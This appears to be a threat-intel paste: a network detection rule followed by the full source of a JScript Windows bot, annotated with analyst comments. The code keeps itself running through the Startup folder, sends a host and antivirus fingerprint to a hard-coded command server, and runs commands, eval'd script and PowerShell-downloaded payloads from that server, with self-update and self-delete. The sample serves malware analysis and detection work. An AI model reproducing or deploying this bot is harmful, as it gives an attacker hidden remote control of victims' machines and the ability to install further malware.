
Jscript Bot

James_inthe_box Jan 6th, 2019 505 Never
  1. alert tcp $HOME_NET any -> $EXTERNAL_NET !$HTTP_PORTS (msg:"JScript Bot Initial Checkin"; flow:established,to_server; content:"POST"; http_method; content:"User-Agent|3a| xmsSofts_1.0.0_"; content:"Content-Length|3a 20|0"; http_header; classtype:trojan-activity; sid:20166280; rev:1; metadata:created_at 2019_01_06;)
  2.  
// ---- Analyst annotation (sample left as posted; comments only) ----
// Globals: the two COM handles the bot uses, the separator it splits C2
// replies on, and the paths it reads/writes.
var shell = new ActiveXObject('WScript.Shell');
var fstym = new ActiveXObject('Scripting.FileSystemObject');
var spl = '|V|';   // C2 reply format: <order>|V|<data>[|V|<file name>]
var Ch = '\\';     // field separator inside the beacon's User-Agent value
// Bot id carried in the User-Agent: "xmsSofts_1.0.0_" + volume serial (getSerial)
var VN = 'xmsSofts_1.0.0' + '_' + getSerial();
var Startup = getEnv('appdata') + '\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\';
// Computed but never referenced anywhere in this paste.
var StartupAll = getEnv('allusersprofile') + '\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\';
var Temp = getEnv('temp') + '\\';        // drop directory for DwnlExe / UpdateS payloads
var fxDmE4zu = WScript.ScriptFullName;   // full path of the running script (used for self-delete)
var wn = WScript.ScriptName;             // file name only (used for the Startup copy)
var UDex;            // never assigned in this paste, so that beacon field reads "undefined"
var DeLay = 20;      // seconds between finishing a download and launching it
ModinySks();         // persistence: copy self into the user's Startup folder
// Main loop: beacon every 5 s and dispatch on the first field of the reply.
do {
    try {
        var send = SendHttp();
        var Command = send.split(spl);
        var order = Command[0];
        var order_data = Command[1];
        if (order === 'Ex') {
            eval(order_data);   // arbitrary JScript from the C2, run in this process
        }
        if (order === 'Cmd') {
            shell.Run(order_data, 0, false);   // hidden window (0), no wait (false)
        }
        if (order === 'DwnlExe') {
            // Command[1] = URL, Command[2] = file name under %temp%.
            // Download through a PowerShell WebClient (follows redirects), wait
            // DeLay seconds, then launch the file with PowerShell's `start`.
            var path = Temp + Command[2];
            shell.Run("powershell.exe $WebClient =New-Object System.Net.WebClient;$WebClient.AllowAutoRedirect=true;$WebClient.DownloadFile('" + Command[1] + "','" + path + "')", 0, false);
            WScript.Sleep(DeLay * 1000);
            shell.Run('powershell.exe start ' + path, 0, false);
        }
        if (order === 'SelfRemove') {
            // Remove the Startup copy and the original script, then exit.
            shell.Run("powershell.exe del '" + Startup + wn + "'", 0, false);
            shell.Run("powershell.exe del '" + fxDmE4zu + "'", 0, false);
            WScript.Quit(1);
        }
        if (order === 'UpdateS') {
            // Same download as DwnlExe, but this Run waits for completion (third
            // argument true). If the file landed, delete both existing copies of
            // this script, launch the new file after DeLay seconds, and exit.
            var path = Temp + Command[2];
            shell.Run("powershell.exe $WebClient =New-Object System.Net.WebClient;$WebClient.AllowAutoRedirect=true;$WebClient.DownloadFile('" + Command[1] + "','" + path + "')", 0, true);
            if (fstym.fileexists(path)) {
                shell.Run("powershell.exe del '" + Startup + wn + "'", 0, false);
                shell.Run("powershell.exe del '" + fxDmE4zu + "'", 0, false);
                WScript.Sleep(DeLay * 1000);
                shell.Run("powershell.exe start '" + path + "'", 0, false);
                WScript.Quit(1);
            }
        }
    } catch (err) {
        // util_log and _inspect are not defined anywhere in this paste; if this
        // handler is reached (e.g. the C2 is unreachable and send() throws) the
        // resulting ReferenceError is uncaught and the script terminates.
        util_log('>>> Silencing catch ' + _inspect(err));
    }
    WScript.Sleep(5000);   // 5 s beacon interval
} while (true);
/**
 * Beacon to the C2: a synchronous POST over plain HTTP to the hard-coded
 * URL, with the host fingerprint (getUserAgent) as the User-Agent value.
 * @param {string|undefined} R - request body. The only caller in this paste
 *   (the main loop) passes nothing, so the POST body is empty — consistent
 *   with the "Content-Length: 0" match in the rule at the top of the paste.
 * @returns {string} raw response text, which the caller splits on '|V|'
 */
function SendHttp(R) {
    var X = new ActiveXObject('Microsoft.XMLHTTP');
    X.open('POST', 'http://micro-soft-updates.ga:8880/connect', false);   // false = synchronous
    var useragent = getUserAgent();
    // NOTE(review): the header name is passed with a trailing colon
    // ('User-Agent:'). How MSXML serializes that on the wire should be
    // confirmed on a capture before relying on the exact "User-Agent|3a| "
    // content match in the rule above.
    X.SetRequestHeader('User-Agent:', useragent);
    X.send(R);
    return X.responsetext;
}
/**
 * Builds the host-fingerprint string sent as the beacon's User-Agent.
 * Fields are separated by a backslash (Ch), in this order:
 *   VN \ COMPUTERNAME \ USERNAME \ <OS caption>[<address width>] \ <AV list> \ YES|NO \ UDex \
 * Each value (except VN, NT and UDex) passes through jsUcfirst first.
 * @returns {string}
 */
function getUserAgent() {
    var s, NT, i;
    // NT flags whether the .NET Framework 2.0 VB compiler (vbc.exe) exists on
    // the host; what the C2 does with that flag is not visible in this paste.
    if (fstym.fileexists(getEnv('Windir') + '\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe')) {
        NT = 'YES';
    } else {
        NT = 'NO';
    }
    // UDex is declared at top level but never assigned, so it serializes as "undefined".
    s = VN + Ch + jsUcfirst(getEnv('COMPUTERNAME')) + Ch + jsUcfirst(getEnv('USERNAME')) + Ch + jsUcfirst(getSystem() + '[' + getOSVer() + ']') + Ch + jsUcfirst(getAntiV()) + Ch + NT + Ch + UDex + Ch;
    return s;
}
/**
 * Expands the environment variable named S via WScript.Shell.
 * @param {string} S - variable name without the surrounding percent signs
 * @returns {string} the expanded value of %S%
 */
function getEnv(S) {
    return shell.ExpandEnvironmentStrings('%' + S + '%');
}
/**
 * Returns the VolumeSerialNumber of the first Win32_LogicalDisk instance
 * enumerated through WMI; it becomes the per-host suffix of the bot id VN.
 * The loop returns on its first item (the `break` after the return is
 * unreachable); if WMI yields no instances the function returns undefined.
 * @returns {string|undefined}
 */
function getSerial() {
    var s;
    s = GetObject('winmgmts:').InstancesOf('win32_logicaldisk');
    var en = new Enumerator(s);
    for (; !en.atEnd(); en.moveNext()) {
        var it = en.item();
        return it.volumeserialnumber;
        break;
    }
}
/**
 * Returns the Caption of the first Win32_OperatingSystem instance from WMI
 * (the OS product name). Same first-item-return shape as getSerial; returns
 * undefined when no instance is enumerated.
 * @returns {string|undefined}
 */
function getSystem() {
    var s = GetObject('winmgmts:').InstancesOf('Win32_OperatingSystem');
    var en = new Enumerator(s);
    for (; !en.atEnd(); en.moveNext()) {
        var it = en.item();
        return it.Caption;
        break;
    }
}
/**
 * Despite the name, this is not an OS version: it reads the AddressWidth of
 * the Win32_Processor instance 'cpu0' (32 or 64). getUserAgent places the
 * value in square brackets after the OS caption.
 * @returns {number}
 */
function getOSVer() {
    return GetObject("winmgmts:root\\cimv2:Win32_Processor='cpu0'").AddressWidth;
}
/**
 * Collects the DisplayName of every AntiVirusProduct registered in WMI
 * Security Center, querying root\securitycenter first and then
 * root\securitycenter2, and returns the names joined with ' , '.
 * Both queries are wrapped in try/catch whose handlers call util_log /
 * _inspect, which are not defined in this paste (see the main loop note).
 * @returns {string} comma-separated product names; '' when none were found
 */
function getAntiV() {
    var s;
    var finalx = [];
    var wmg = 'winmgmts:\\\\localhost\\root\\securitycenter';
    try {
        s = GetObject(wmg).InstancesOf('AntiVirusProduct');
        var en = new Enumerator(s);
        for (; !en.atEnd(); en.moveNext()) {
            var it = en.item();
            var str = it.DisplayName;
            finalx.push(str);
        }
    } catch (e) {
        util_log('>>> Silencing catch ' + _inspect(e));
    }
    // `str` is a hoisted var: if the first query found nothing (or threw) it is
    // undefined, and undefined !== '' is true, so the securitycenter2 query runs
    // in every case except when the last product seen had an empty DisplayName.
    if (str !== '') {
        wmg = wmg + '2';   // -> root\securitycenter2
        try {
            s = GetObject(wmg).InstancesOf('AntiVirusProduct');
            en = new Enumerator(s);
            for (; !en.atEnd(); en.moveNext()) {
                it = en.item();
                var str = it.DisplayName;
                finalx.push(str);
            }
        } catch (e) {
            util_log('>>> Silencing catch ' + _inspect(e));
        }
    } else {
        // intentionally empty in the sample
    }
    var finalxsrt = finalx.join(' , ');
    return finalxsrt;
}
/**
 * Persistence: copies the running script (fxDmE4zu) into the current user's
 * Startup folder under its own file name (Startup + wn) using a hidden
 * PowerShell Copy-Item. Called once at startup before the beacon loop.
 * The catch handler references util_log / _inspect, which are not defined
 * in this paste.
 */
function ModinySks() {
    try {
        shell.Run("powershell.exe Copy-Item -Path '" + fxDmE4zu + "' -Destination '" + Startup + wn + "'", 0, false);
    } catch (err) {
        util_log('>>> Silencing catch ' + _inspect(err));
    }
}
/**
 * Upper-cases the first character of `string` and removes the first
 * backslash in it (String.prototype.replace with a string pattern replaces
 * only the first occurrence). Used so fingerprint fields cannot inject the
 * backslash that getUserAgent uses as its field separator.
 * @param {string} string
 * @returns {string}
 */
function jsUcfirst(string) {
    var strx = string.charAt(0).toUpperCase() + string.slice(1);
    strx = strx.replace('\\', '');
    return strx;
}